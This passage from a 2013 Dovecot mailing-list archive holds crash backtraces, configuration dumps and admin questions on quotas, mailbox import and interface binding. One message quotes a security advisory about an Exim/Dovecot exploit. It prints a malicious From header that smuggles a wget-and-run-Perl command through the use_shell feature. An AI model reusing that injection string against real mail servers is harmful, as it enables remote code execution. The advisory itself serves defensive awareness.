0x7f305d71e70b "", mailbox_dir_name = 0x7f305d71e70b "", escape_char = 0 '\000', broken_char = 0 '\000', utf8 = false, alt_dir_nocheck = false} list_flags = p = __FUNCTION__ = "mail_storage_create_full" #4 0x00007f305d6c4b7e in mail_storage_create (ns=ns at entry=0x12673f0, driver=driver at entry=0x7f305d7263a4 "raw", flags=flags at entry=0, error_r=error_r at entry=0x7fff92c0d338) at mail-storage.c:407 storage = 0x7f305dd87a38 #5 0x00007f305d6bd605 in raw_storage_create_from_set (set_info=, set=) at raw-storage.c:48 user = 0x126d7f0 ns = 0x12673f0 ns_set = 0x126f2e0 mail_set = error = 0x0 #6 0x0000000000405762 in client_raw_user_create (client=) at client.c:150 sets = #7 client_create (fd_in=12, fd_out=12, conn=) at client.c:242 client = 0x1267f10 pool = 0x1267ef0 #8 0x00007f305d3a8740 in master_service_listen (l=0x1266120) at master-service.c:826 service = 0x12625a0 conn = {fd = 12, listen_fd = 8, name = 0x1262905 "dovecot-lmtp", remote_ip = {family = 0, u = {ip6 = {__in6_u = {__u6_addr8 = '\000' , __u6_addr16 = {0, 0, 0, 0, 0, 0, 0, 0}, __u6_addr32 = {0, 0, 0, 0}}}, ip4 = {s_addr = 0}}}, remote_port = 0, fifo = 0, ssl = 0, accepted = 1} #9 0x00007f305d3f2996 in io_loop_call_io (io=0x12661c0) at ioloop.c:387 ioloop = 0x1262710 t_id = 2 #10 0x00007f305d3f3807 in io_loop_handler_run (ioloop=ioloop at entry=0x1262710) at ioloop-epoll.c:215 ctx = 0x1265540 events = 0x0 event = 0x12655b0 list = 0x1266210 io = tv = {tv_sec = 2147483, tv_usec = 0} events_count = msecs = ret = 1 i = call = __FUNCTION__ = "io_loop_handler_run" #11 0x00007f305d3f24d8 in io_loop_run (ioloop=0x1262710) at ioloop.c:406 No locals. ---Type to continue, or q to quit--- #12 0x00007f305d3a8013 in master_service_run (service=0x12625a0, callback=callback at entry=0x404dd0 ) at master-service.c:560 No locals. #13 0x0000000000404c24 in main (argc=1, argv=0x1262390) at main.c:122 set_roots = {0x60a6a0, 0x409260, 0x0} service_flags = storage_service_flags = 675 c = -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 203 bytes Desc: Message signed with OpenPGP using GPGMail URL: From noel.butler at ausics.net Sun Jun 9 12:50:06 2013 From: noel.butler at ausics.net (Noel Butler) Date: Sun, 09 Jun 2013 19:50:06 +1000 Subject: [Dovecot] from ISC: Exim/Dovecot exploit making the rounds In-Reply-To: <51B43594.8030705@luigirosa.com> References: <51B43594.8030705@luigirosa.com> Message-ID: <1370771406.13626.3.camel@tardis> Actually, it is an exploit against dovecot LDA, introduced, and caused by, exim. On Sun, 2013-06-09 at 09:58 +0200, Luigi Rosa wrote: > One of our readers wrote in to let us know that he had received an attempted > Exim/Dovecot exploit attempt against his email server. The exploit partially > looked like this: > > From: > x`wget${IFS}-O${IFS}/tmp/crew.pl${IFS}50.xx.xx.xx/dc.txt``perl${IFS}/tmp/crew.pl`@blaat.com > > (Obviously edited for your safety, and I didn't post the whole thing.) > > This is an exploit against Dovecot that is using the feature "use_shell" against > itself. This feature, unfortunately, is found in the example wiki on Dovecot's > website, and also in their example configuration. We'd caution anyone that is > using Dovecot to take a look at their configuration and make use they aren't > using the "use_shell" parameter. Or if you are, make darn sure you know what > you are doing, and how to defend yourself. > > > https://isc.sans.edu/diary/EximDovecot+exploit+making+the+rounds/15962 > > > > > Ciao, > luigi > -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 490 bytes Desc: This is a digitally signed message part URL: From listserv at xtlv.cn Sun Jun 9 14:44:44 2013 From: listserv at xtlv.cn (listserv) Date: Sun, 09 Jun 2013 13:44:44 +0200 Subject: [Dovecot] lmpt-service crash after update Message-ID: <51B46AAC.7020508@xtlv.cn> Hello, since the last update today without a change on the config, the lmtp-service crash with the follow messages: -------- Jun 9 13:16:43 kobe kernel: lmtp[25881]: segfault at 4 ip b7568e83 sp bfbe01b0 error 4 in libdovecot.so.0.0.0[b750c000+c6000] -------- Jun 9 13:16:43 kobe dovecot: lmtp(25881): Fatal: master: service(lmtp): child 25881 killed with signal 11 (core dumped) -------- GNU gdb (GDB) 7.6-debian Copyright (C) 2013 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "i486-linux-gnu". For bug reporting instructions, please see: ... Reading symbols from /usr/lib/dovecot/lmtp...(no debugging symbols found)...done. [New LWP 25823] warning: Could not load shared library symbols for linux-gate.so.1. Do you need "set solib-search-path" or "set sysroot"? [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/i386-linux-gnu/i686/cmov/libthread_db.so.1". Core was generated by `dovecot/lmtp'. Program terminated with signal 11, Segmentation fault. #0 0xb75a2e83 in buffer_append () from /usr/lib/dovecot/libdovecot.so.0 (gdb) bt full #0 0xb75a2e83 in buffer_append () from /usr/lib/dovecot/libdovecot.so.0 No symbol table info available. #1 0xb76821cb in mail_namespace_add_storage () from /usr/lib/dovecot/libdovecot-storage.so.0 No symbol table info available. #2 0xb76885ed in mail_storage_create_full () from /usr/lib/dovecot/libdovecot-storage.so.0 No symbol table info available. #3 0xb76889a5 in mail_storage_create () from /usr/lib/dovecot/libdovecot-storage.so.0 No symbol table info available. #4 0xb76802f5 in raw_storage_create_from_set () from /usr/lib/dovecot/libdovecot-storage.so.0 No symbol table info available. #5 0x0804c578 in client_create () No symbol table info available. #6 0x0804bbf2 in _start () No symbol table info available. (gdb) ---------- doveconf -n # 2.2.2 (266101990d63): /etc/dovecot/dovecot.conf # OS: Linux 3.2.28.stk32 i686 Debian jessie/sid ext3 auth_debug = yes auth_debug_passwords = yes auth_mechanisms = digest-md5 cram-md5 auth_username_translation = %Lu auth_verbose = yes auth_verbose_passwords = plain dict { expire = db:/var/lib/dovecot/expire.db } hostname = kobe.vtlx.cn mail_attachment_dir = /var/mail/attachment mail_debug = yes mail_gid = vmail mail_home = /var/mail/vhosts/%Ld/%Ln mail_location = sdbox:/var/mail/vhosts/%Ld/%Ln:DIRNAME=DbOx-mAiLs mail_plugins = " quota mail_log notify expire zlib" mail_privileged_group = vmail mail_uid = vmail mailbox_list_index = yes managesieve_notify_capability = mailto managesieve_sieve_capability = fileinto reject envelope encoded-character vacation subaddress comparator-i;ascii-numeric relational regex imap4flags copy include variables body enotify environment mailbox date ihave namespace inbox { inbox = yes location = mailbox Drafts { auto = subscribe special_use = \Drafts } mailbox Sent { auto = subscribe special_use = \Sent } mailbox Spam { auto = subscribe special_use = \Junk } mailbox Trash { auto = subscribe special_use = \Trash } prefix = separator = / subscriptions = yes type = private } passdb { args = scheme=PLAIN username_format=%Lu /etc/dovecot/user_pw/passwd driver = passwd-file } plugin { acl = vfile acl_shared_dict = file:/var/mail/shared-db/shared-mailboxes expire = Trash 2h expire_dict = proxy::expire mail_log_events = delete undelete copy mailbox_delete mailbox_rename expunge save mailbox_create mail_log_fields = uid box msgid size quota = dict:User quota::file:/var/mail/vhosts/%Ld/%Ln/dovecot-quota quota_exceeded_message = Die Mailbox des Empfaengers ist voll -- Quota exceeded -- Please contact quota_grace = 10%% quota_rule = *:storage=30M quota_rule2 = Trash:storage=+10%% quota_status_nouser = DUNNO quota_status_overquota = "552 5.5.2 Die Mailbox des Empfaengers ist voll ## Quota exceeded ## Please contact " quota_status_success = DUNNO quota_warning = storage=95%% quota-warning 95 %u quota_warning2 = storage=90%% quota-warning 90 %u quota_warning3 = storage=85%% quota-warning 85 %u quota_warning4 = storage=80%% quota-warning 80 %u quota_warning5 = storage=70%% quota-warning 70 %u sieve = ~/.dovecot.sieve sieve_dir = ~/sieve } postmaster_address = postmaster at xtlv.cn protocols = " imap lmtp sieve pop3" rejection_reason = Your message to <%t> was automatically rejected:%n%r [TEST] service auth { unix_listener /var/spool/postfix/private/auth { group = postfix mode = 0660 user = postfix } unix_listener auth-userdb { mode = 0600 user = vmail } } service config { unix_listener config { mode = 0600 user = vmail } } service dict { unix_listener dict { mode = 0600 user = vmail } } service imap-login { inet_listener imap { port = 0 } inet_listener imaps { address = 84.38.75.143 port = 993 ssl = yes } } service lmtp { unix_listener /var/spool/postfix/private/dovecot-lmtp { group = postfix mode = 0660 user = postfix } } service managesieve-login { inet_listener sieve { address = 84.38.75.143 port = 4190 } } service pop3-login { inet_listener pop3 { port = 0 } inet_listener pop3s { address = 84.38.75.143 port = 995 ssl = yes } } service quota-status { client_limit = 1 executable = quota-status -p postfix unix_listener /var/spool/postfix/private/quota-status { group = postfix mode = 0660 user = postfix } } service quota-warning { executable = script /usr/local/bin/quota-warning.sh unix_listener quota-warning { group = vmail mode = 0660 user = vmail } user = root } ssl_ca = References: Message-ID: On 9.6.2013, at 11.12, Thomas Leuxner wrote: > ==> /var/log/dovecot/dovecot.log <== > Jun 9 09:58:26 spectre dovecot: lmtp: Fatal: master: service(lmtp): child 12635 killed with signal 11 (core dumped) > > This is another segmentation fault introduced in the current code. Fixed: http://hg.dovecot.org/dovecot-2.2/rev/73b7fce1643e > Please also look into fixing the other Core Dump I reported: > > http://www.dovecot.org/list/dovecot/2013-June/090795.html Fixed: http://hg.dovecot.org/dovecot-2.2/rev/921017adcb7b From tlx at leuxner.net Sun Jun 9 16:23:33 2013 From: tlx at leuxner.net (Thomas Leuxner) Date: Sun, 9 Jun 2013 15:23:33 +0200 Subject: [Dovecot] v2.2.2 (266101990d63) Core Dump In-Reply-To: References: Message-ID: <20130609132333.GA3696@nihlus.leuxner.net> * Timo Sirainen 2013.06.09 13:57: > Fixed: http://hg.dovecot.org/dovecot-2.2/rev/73b7fce1643e > Fixed: http://hg.dovecot.org/dovecot-2.2/rev/921017adcb7b Both confirmed. Thanks. -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 198 bytes Desc: Digital signature URL: From dovecot at lists.wgwh.ch Sun Jun 9 17:34:54 2013 From: dovecot at lists.wgwh.ch (Oli Schacher) Date: Sun, 9 Jun 2013 16:34:54 +0200 Subject: [Dovecot] Man page: LGPL Version Message-ID: <20130609163454.00001631@unknown> Hi Timo http://hg.dovecot.org/dovecot-2.2/rev/1f3f21081ee5 : man pages: Updated v2.1 -> v2.2 dovecot.1.in now references a inexistent "LGPLv2.2" instead of "LGPLv2.1" From tss at iki.fi Sun Jun 9 21:07:40 2013 From: tss at iki.fi (Timo Sirainen) Date: Sun, 9 Jun 2013 21:07:40 +0300 Subject: [Dovecot] Man page: LGPL Version In-Reply-To: <20130609163454.00001631@unknown> References: <20130609163454.00001631@unknown> Message-ID: <81281785-4C56-4A9D-8E0D-6FD20E5A8B2F@iki.fi> On 9.6.2013, at 17.34, Oli Schacher wrote: > Hi Timo > > http://hg.dovecot.org/dovecot-2.2/rev/1f3f21081ee5 : man pages: Updated > v2.1 -> v2.2 > > dovecot.1.in now references a inexistent "LGPLv2.2" instead of > "LGPLv2.1" Good catch :) Thanks, fixed: http://hg.dovecot.org/dovecot-2.2/rev/45399357008a From shop at open-t.co.uk Mon Jun 10 12:45:41 2013 From: shop at open-t.co.uk (Sebastian Arcus) Date: Mon, 10 Jun 2013 10:45:41 +0100 Subject: [Dovecot] Wait for interface to become available instead of dying? Message-ID: <51B5A045.2050006@open-t.co.uk> At the moment, if one of the interfaces specified with "listen=" in dovecot.conf is not up when Dovecot is started, then Dovecot just refuses to start. Is there an option to make Dovecot start anyway, and just use the interface when it becomes available? It is inconvenient to have Dovecot refuse to start during boot because some interface is temporarily not available. Then again, maybe there is some strong security reasoning behind the way Dovecot behaves at the moment? From ltlbeaver at gmail.com Mon Jun 10 13:14:42 2013 From: ltlbeaver at gmail.com (John Doe) Date: Mon, 10 Jun 2013 13:14:42 +0300 Subject: [Dovecot] per user quota in mysql In-Reply-To: References: Message-ID: Hi, Thank you for responding but i have read in the dovecot documentation and in postfixadmin documentation that: - The setup gets userdb and passdb info from MySQL as well as quotas ( postfixadmin documentation ) - Quota backend specifies the method how Dovecot keeps track of the current quota usage. They don't (usually) specify users' quota limits, that's done by returning extra fields from userdb ( http://wiki2.dovecot.org/Quota ) My question is that if i can keep per user quota limits in a mysql database and user ldap database for authentication. I can't see anywhere in the docs if i can return user and password data from ldap and per user quota from mysql, if i am mistaken, please give me the link. Thank you! On Sun, Jun 9, 2013 at 7:22 AM, Benny Pedersen wrote: > John Doe skrev den 2013-06-07 15:32: > > > I have set up dovecot to use ldap authentication and it works great. >> I wonder if it is possible to use mysql for user quota and still keep my >> ldap authentication. >> > > yes no problem, for more help check postfixadmin on sf.net, even if you > dont use it, there is good examples on configure it with dovecot quotas > > -- > senders that put my email into body content will deliver it to my own > trashcan, so if you like to get reply, dont do it > From tblomenk at math.uni-bielefeld.de Mon Jun 10 13:30:51 2013 From: tblomenk at math.uni-bielefeld.de (Thomas Blomenkamp) Date: Mon, 10 Jun 2013 12:30:51 +0200 (CEST) Subject: [Dovecot] dovecot segfaults after upgrade Message-ID: Using dovecot on debian oldstable (squeeze) with daily builded repository, after an upgrade this morning, dovecot always shows the following error: 2013 Jun 10 11:07:22 mailstore imap(tblomenk): Fatal: master: service(imap): child 3016 killed with signal 11 (core dumps disabled) Jun 10 11:07:22 mailstore kernel: [ 1589.400741] imap[3016]: segfault at 7fffd9048ff8 ip 00007f91417e2c3b sp 00007fffd9049000 error 6 in libdovecot.so.0.0.0[7f9141796000+bc000] Please notice: I can reproduce the error by trying to access my mailbox with alpine or mutt, while alpine only can access my inbox. If I try to access my other folders, the error happens. Mutt always closes the connection after trying to login. It is a little bit strange because with a newer client like roundcube I can access all my folders successfully. In all kernel error messages it seems that error 6 in libdovecot.so.0.0.0[7f9141796000+bc000] is always the same. Also notice that dovecot is still running, it is just that you cannot access other folders than your inbox with pine. mailstore:~# dovecot --version 2.2.2 (45399357008a) mailstore:~# dovecot -n # 2.2.2 (45399357008a): /etc/dovecot/dovecot.conf doveconf: Warning: service auth { client_limit=1000 } is lower than required under max. load (1324) doveconf: Warning: service anvil { client_limit=1000 } is lower than required under max. load (1227) # OS: Linux 2.6.32-5-amd64 x86_64 Debian 6.0.7 auth_debug = yes auth_gssapi_hostname = mailstore.math.uni-bielefeld.de auth_mechanisms = plain login auth_username_format = %n auth_verbose = yes lmtp_save_to_detail_mailbox = yes log_timestamp = "%Y-%m-%d %H:%M:%S " login_greeting = Hi, the IMAP Mail-System on mailstore.math.uni-bielefeld.de is ready. login_log_format_elements = user=<%u> method=%m rip=%r lip=%l %c mail_location = mdbox:~/mdbox mail_plugins = acl mail_privileged_group = mail managesieve_notify_capability = mailto managesieve_sieve_capability = fileinto reject envelope encoded-character vacation subaddress comparator-i;ascii-numeric relational regex imap4flags copy include variables body enotify environment mailbox date ihave spamtest spamtestplus imapflags notify namespace { list = children location = mdbox:%%h/mdbox prefix = shared/%%u/ separator = / subscriptions = no type = shared } namespace inbox { inbox = yes location = mailbox Drafts { auto = subscribe special_use = \Drafts } mailbox Sent { auto = subscribe special_use = \Sent } mailbox Spam { auto = subscribe special_use = \Junk } mailbox Trash { auto = subscribe special_use = \Trash } prefix = separator = / type = private } passdb { args = /etc/dovecot/dovecot-ldap.conf driver = ldap } plugin { acl = vfile acl_shared_dict = file:/var/lib/dovecot/shared-mailboxes.db mail_log_events = delete undelete expunge copy mailbox_delete mailbox_rename mail_log_fields = uid box msgid size mail_log_group_events = no quota = maildir:User quota quota_rule = *:storage=0 sieve = ~/.dovecot.sieve sieve_dir = ~/sieve sieve_extensions = +imapflags +notify +spamtest +spamtestplus sieve_spamtest_max_value = 100 sieve_spamtest_status_header = X-PMX-Spam: \.*Probability=([[:digit:]]+)%+\.* sieve_spamtest_status_type = score } protocols = imap lmtp sieve service auth { unix_listener auth-master { mode = 0600 user = vmail } unix_listener auth-userdb { user = vmail } user = root } service imap-login { inet_listener imap { port = 143 } inet_listener imaps { port = 0 } process_limit = 1024 process_min_avail = 10 service_count = 1 } service imap { process_limit = 1024 } service lmtp { unix_listener /var/spool/postfix/private/dovecot-lmtp { group = postfix mode = 0660 user = postfix } } service managesieve-login { inet_listener sieve { port = 4190 } service_count = 1 vsz_limit = 64 M } ssl_cert = I've been tasked with importing a large bunch of mbox folders (about 500) into an existing mdbox setup in Dovecot 2.1 As far as I can see, dsync "mirror" or "backup" are both inappropriate ways of doing this. Does anyone have any suggestions about how I could proceed? Thanks in advance From wdehoog at exalondelft.nl Mon Jun 10 14:56:02 2013 From: wdehoog at exalondelft.nl (W. de Hoog) Date: Mon, 10 Jun 2013 13:56:02 +0200 Subject: [Dovecot] doveadm index crashes when indexing shared mailboxes Message-ID: <51B5BED2.4070500@exalondelft.nl> Hi, We store our mail archive in a tree of subfolders. I am trying to speed up text searching on our mail archive but when running "doveadm -D -v index -u neil shared/Exalon/Aandeelhouders" the following output is produced: doveadm(neil): Debug: Loading modules from directory: /usr/lib/dovecot/modules doveadm(neil): Debug: Module loaded: /usr/lib/dovecot/modules/lib20_fts_plugin.so doveadm(neil): Debug: Module loaded: /usr/lib/dovecot/modules/lib21_fts_squat_plugin.so doveadm(neil): Debug: Loading modules from directory: /usr/lib/dovecot/modules/doveadm doveadm(neil): Debug: Skipping module doveadm_acl_plugin, because dlopen() failed: /usr/lib/dovecot/modules/doveadm/lib10_dovea dm_acl_plugin.so: undefined symbol: acl_user_module (this is usually intentional, so just ignore this message) doveadm(neil): Debug: Skipping module doveadm_expire_plugin, because dlopen() failed: /usr/lib/dovecot/modules/doveadm/lib10_do veadm_expire_plugin.so: undefined symbol: expire_set_deinit (this is usually intentional, so just ignore this message) doveadm(neil): Debug: Skipping module doveadm_quota_plugin, because dlopen() failed: /usr/lib/dovecot/modules/doveadm/lib10_dov eadm_quota_plugin.so: undefined symbol: quota_user_module (this is usually intentional, so just ignore this message) doveadm(neil): Debug: Skipping module doveadm_zlib_plugin, because dlopen() failed: /usr/lib/dovecot/modules/doveadm/lib10_dove adm_zlib_plugin.so: undefined symbol: i_stream_create_deflate (this is usually intentional, so just ignore this message) doveadm(neil): Debug: Module loaded: /usr/lib/dovecot/modules/doveadm/lib20_doveadm_fts_plugin.so doveadm(neil): Debug: auth input: neil system_groups_user=neil uid=1000 gid=1000 home=/home/neil doveadm(neil): Debug: Effective uid=1000, gid=1000, home=/home/neil doveadm(neil): Debug: Namespace inbox: type=private, prefix=, sep=, inbox=yes, hidden=no, list=yes, subscriptions=yes location= mbox:~/mail:INBOX=/var/mail/neil doveadm(neil): Debug: fs: root=/home/neil/mail, index=, control=, inbox=/var/mail/neil, alt= doveadm(neil): Debug: Namespace : type=shared, prefix=shared/, sep=/, inbox=no, hidden=no, list=yes, subscriptions=no location= mbox:~imapshared doveadm(neil): Debug: mbox: INBOX defaulted to /home/imapshared/inbox doveadm(neil): Debug: fs: root=/home/imapshared, index=, control=, inbox=/home/imapshared/inbox, alt= doveadm(neil): Info: shared/Exalon/Aandeelhouders: Caching mails seq=1..27 27/27 doveadm(neil): Panic: file mbox-storage.c: line 711 (mbox_transaction_unlock): assertion failed: (mbox->box.transaction_count > 0 || mbox->mbox_lock_type == F_UNLCK) doveadm(neil): Error: Raw backtrace: /usr/lib/dovecot/libdovecot.so.0(+0x3c0ba) [0x7fb91d7460ba] -> /usr/lib/dovecot/libdovecot .so.0(default_fatal_handler+0x2a) [0x7fb91d74617a] -> /usr/lib/dovecot/libdovecot.so.0(i_fatal+0) [0x7fb91d71d85a] -> /usr/lib/ dovecot/libdovecot-storage.so.0(+0x54d80) [0x7fb91d9e4d80] -> /usr/lib/dovecot/libdovecot-storage.so.0(+0x54dee) [0x7fb91d9e4de e] -> /usr/lib/dovecot/modules/lib20_fts_plugin.so(+0xb0e2) [0x7fb91c2c30e2] -> /usr/lib/dovecot/libdovecot-storage.so.0(mailbo x_transaction_commit_get_changes+0x3d) [0x7fb91da0010d] -> /usr/lib/dovecot/libdovecot-storage.so.0(mailbox_transaction_commit+ 0x15) [0x7fb91da00145] -> /usr/lib/dovecot/modules/lib21_fts_squat_plugin.so(+0x3927) [0x7fb91c0ab927] -> /usr/lib/dovecot/modu les/lib21_fts_squat_plugin.so(+0x39b1) [0x7fb91c0ab9b1] -> /usr/lib/dovecot/modules/lib20_fts_plugin.so(+0x649c) [0x7fb91c2be49 c] -> /usr/lib/dovecot/modules/lib20_fts_plugin.so(fts_backend_update_deinit+0x2b) [0x7fb91c2be59b] -> /usr/lib/dovecot/modules /lib20_fts_plugin.so(+0xb03c) [0x7fb91c2c303c] -> /usr/lib/dovecot/modules/lib20_fts_plugin.so(+0xb0d3) [0x7fb91c2c30d3] -> /us r/lib/dovecot/libdovecot-storage.so.0(mailbox_transaction_commit_get_changes+0x3d) [0x7fb91da0010d] -> /usr/lib/dovecot/libdove cot-storage.so.0(mailbox_transaction_commit+0x15) [0x7fb91da00145] -> /usr/bin/doveadm(+0x15430) [0x7fb91e0fb430] -> /usr/bin/d oveadm(+0x11f66) [0x7fb91e0f7f66] -> /usr/bin/doveadm(+0x12a41) [0x7fb91e0f8a41] -> /usr/bin/doveadm(doveadm_mail_try_run+0x161 ) [0x7fb91e0f8f01] -> /usr/bin/doveadm(main+0x3d1) [0x7fb91e0f7b21] -> /lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf5) [0x7fb91d363ea5] -> /usr/bin/doveadm(+0x11d55) [0x7fb91e0f7d55] Aborted (core dumped) When indexing is triggered using the imap server it logs: Jun 10 12:32:16 indexer: Error: Indexer worker disconnected, discarding 1 requests for neil Jun 10 12:32:16 indexer-worker(neil): Fatal: master: service(indexer-worker): child 22173 killed with signal 6 (core dumps disabled) Jun 10 12:32:16 imap(neil): Error: indexer failed to index mailbox shared/Suppliers/NXP Jun 10 12:32:16 indexer-worker: Debug: Loading modules from directory: /usr/lib/dovecot/modules Jun 10 12:32:16 indexer-worker: Debug: Module loaded: /usr/lib/dovecot/modules/lib20_fts_plugin.so Jun 10 12:32:16 indexer-worker: Debug: Module loaded: /usr/lib/dovecot/modules/lib21_fts_squat_plugin.so Jun 10 12:32:16 indexer-worker: Debug: auth input: neil system_groups_user=neil uid=1000 gid=1000 home=/home/neil Jun 10 12:32:16 indexer-worker(neil): Debug: Effective uid=1000, gid=1000, home=/home/neil Jun 10 12:32:16 indexer-worker(neil): Debug: Namespace inbox: type=private, prefix=, sep=, inbox=yes, hidden=no, list=yes, subscriptions=yes location=mbox:~/mail:INBOX=/var/mail/nei l Jun 10 12:32:16 indexer-worker(neil): Debug: fs: root=/home/neil/mail, index=, control=, inbox=/var/mail/neil, alt= Jun 10 12:32:16 indexer-worker(neil): Debug: Namespace : type=shared, prefix=shared/, sep=/, inbox=no, hidden=no, list=yes, subscriptions=no location=mbox:~imapshared Jun 10 12:32:16 indexer-worker(neil): Debug: mbox: INBOX defaulted to /home/imapshared/inbox Jun 10 12:32:16 indexer-worker(neil): Debug: fs: root=/home/imapshared, index=, control=, inbox=/home/imapshared/inbox, alt= Jun 10 12:32:16 indexer-worker(neil): Panic: file mbox-storage.c: line 711 (mbox_transaction_unlock): assertion failed: (mbox->box.transaction_count > 0 || mbox->mbox_lock_type == F _UNLCK) Jun 10 12:32:16 indexer-worker(neil): Error: Raw backtrace: /usr/lib/dovecot/libdovecot.so.0(+0x3c0ba) [0x7f9da1ef60ba] -> /usr/lib/dovecot/libdovecot.so.0(+0x3c0fe) [0x7f9da1ef60fe ] -> /usr/lib/dovecot/libdovecot.so.0(i_fatal+0) [0x7f9da1ecd85a] -> /usr/lib/dovecot/libdovecot-storage.so.0(+0x54d80) [0x7f9da2194d80] -> /usr/lib/dovecot/libdovecot-storage.so.0( +0x54dee) [0x7f9da2194dee] -> /usr/lib/dovecot/modules/lib20_fts_plugin.so(+0xb0e2) [0x7f9da0a730e2] -> /usr/lib/dovecot/libdovecot-storage.so.0(mailbox_transaction_commit_get_chang es+0x3d) [0x7f9da21b010d] -> /usr/lib/dovecot/libdovecot-storage.so.0(mailbox_transaction_commit+0x15) [0x7f9da21b0145] -> /usr/lib/dovecot/modules/lib21_fts_squat_plugin.so(+0x3927 ) [0x7f9da085b927] -> /usr/lib/dovecot/modules/lib21_fts_squat_plugin.so(+0x39b1) [0x7f9da085b9b1] -> /usr/lib/dovecot/modules/lib20_fts_plugin.so(+0x649c) [0x7f9da0a6e49c] -> /usr/ lib/dovecot/modules/lib20_fts_plugin.so(fts_backend_update_deinit+0x2b) [0x7f9da0a6e59b] -> /usr/lib/dovecot/modules/lib20_fts_plugin.so(+0xb03c) [0x7f9da0a7303c] -> /usr/lib/doveco t/modules/lib20_fts_plugin.so(+0xb0d3) [0x7f9da0a730d3] -> /usr/lib/dovecot/libdovecot-storage.so.0(mailbox_transaction_commit_get_changes+0x3d) [0x7f9da21b010d] -> /usr/lib/dovecot /libdovecot-storage.so.0(mailbox_transaction_commit+0x15) [0x7f9da21b0145] -> dovecot/indexer-worker(+0x287c) [0x7f9da265f87c] -> /usr/lib/dovecot/libdovecot.so.0(io_loop_call_io+0x 36) [0x7f9da1f02f76] -> /usr/lib/dovecot/libdovecot.so.0(io_loop_handler_run+0xa7) [0x7f9da1f03c37] -> /usr/lib/dovecot/libdovecot.so.0(io_loop_run+0x28) [0x7f9da1f02988] -> /usr/li b/dovecot/libdovecot.so.0(master_service_run+0x13) [0x7f9da1eef3c3] -> dovecot/indexer-worker(main+0xfe) [0x7f9da265f10e] -> /lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf5) [0x7f9da1b13ea5] -> dovecot/indexer-worker(+0x21b5) [0x7f9da265f1b5] neil at athina:~$ dovecot -n # 2.1.7: /etc/dovecot/dovecot.conf # OS: Linux 3.8.0-23-generic x86_64 Ubuntu 13.04 auth_verbose = yes disable_plaintext_auth = no log_path = /var/log/dovecot.log mail_debug = yes mail_plugins = fts fts_squat mail_privileged_group = mail namespace { list = yes location = mbox:~imapshared prefix = shared/ separator = / subscriptions = no type = shared } namespace inbox { inbox = yes location = mbox:~/mail:INBOX=/var/mail/%u mailbox Drafts { special_use = \Drafts } mailbox Junk { special_use = \Junk } mailbox Sent { special_use = \Sent } mailbox "Sent Messages" { special_use = \Sent } mailbox Trash { special_use = \Trash } prefix = } passdb { driver = pam } plugin { fts = squat fts_squat = partial=4 full=10 sieve = ~/.dovecot.sieve sieve_dir = ~/sieve } protocols = " imap" ssl_cert = References: <51B5A045.2050006@open-t.co.uk> Message-ID: <51B5C32C.8050106@thelounge.net> Am 10.06.2013 11:45, schrieb Sebastian Arcus: > At the moment, if one of the interfaces specified with "listen=" in dovecot.conf is not up when Dovecot is started, > then Dovecot just refuses to start. Is there an option to make Dovecot start anyway, and just use the interface > when it becomes available? It is inconvenient to have Dovecot refuse to start during boot because some interface is > temporarily not available. > > Then again, maybe there is some strong security reasoning behind the way Dovecot behaves at the moment? the main question is why do you not order the start of your services correctly how should a application bind to a specific interface if it is not up? listening on * is no problem in this case but you can hardly bind to a non existing interface -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 263 bytes Desc: OpenPGP digital signature URL: From ajb2 at mssl.ucl.ac.uk Mon Jun 10 16:21:33 2013 From: ajb2 at mssl.ucl.ac.uk (Alan Brown) Date: Mon, 10 Jun 2013 14:21:33 +0100 Subject: [Dovecot] Mailbox conversion/importing - SOLVED In-Reply-To: <51B5B276.80708@site.mssl.ucl.ac.uk> References: <51B5B276.80708@site.mssl.ucl.ac.uk> Message-ID: <51B5D2DD.5040400@site.mssl.ucl.ac.uk> On 10/06/13 12:03, Alan Brown wrote: > > I've been tasked with importing a large bunch of mbox folders (about > 500) into an existing mdbox setup in Dovecot 2.1 > > As far as I can see, dsync "mirror" or "backup" are both inappropriate > ways of doing this. Does anyone have any suggestions about how I could > proceed? I've finally discovered doveadm import. In this instance: doveadm -Dv import -u [user] mbox:/full/path/to/mbox old-mbox all Relative paths don't work. :) From robert at timetraveller.org Mon Jun 10 18:23:38 2013 From: robert at timetraveller.org (Robert Brockway) Date: Tue, 11 Jun 2013 01:23:38 +1000 (EST) Subject: [Dovecot] Mailbox conversion/importing In-Reply-To: <51B5B276.80708@site.mssl.ucl.ac.uk> References: <51B5B276.80708@site.mssl.ucl.ac.uk> Message-ID: On Mon, 10 Jun 2013, Alan Brown wrote: > I've been tasked with importing a large bunch of mbox folders (about 500) > into an existing mdbox setup in Dovecot 2.1 > > As far as I can see, dsync "mirror" or "backup" are both inappropriate ways > of doing this. Does anyone have any suggestions about how I could proceed? I've done a variety of mail migrations over the years, including some that were quite large (hundreds of thousands of accounts). I looked at a few options when doing the first one and ended up concluding that pop/imap was the best way to go. A specialised migration tool must be less tested (and perhaps more buggy) than pop/imap servers that are in use around the world constantly. By using pop/imap proxies we were able to do migrations that were completely transparent to users. This presumes that you are migrating from one server to another. I've always done it like this, rather than having to worry about multiple storage formats on the one server. Cheers, Rob -- Email: robert at timetraveller.org Linux counter ID #16440 IRC: Solver (OFTC & Freenode) Web: http://www.practicalsysadmin.com Director, Software in the Public Interest (http://spi-inc.org/) Information is a gas From raabe at froglogic.com Mon Jun 10 18:35:45 2013 From: raabe at froglogic.com (Frerich Raabe) Date: Mon, 10 Jun 2013 08:35:45 -0700 Subject: [Dovecot] Mailbox conversion/importing In-Reply-To: References: <51B5B276.80708@site.mssl.ucl.ac.uk> Message-ID: Hi Robert, On Jun 10, 2013, at 8:23 AM, Robert Brockway wrote: > I've done a variety of mail migrations over the years, including some that were quite large (hundreds of thousands of accounts). I looked at a few options when doing the first one and ended up concluding that pop/imap was the best way to go. A specialised migration tool must be less tested (and perhaps more buggy) than pop/imap servers that are in use around the world constantly. By using pop/imap proxies we were able to do migrations that were completely transparent to users. I think this 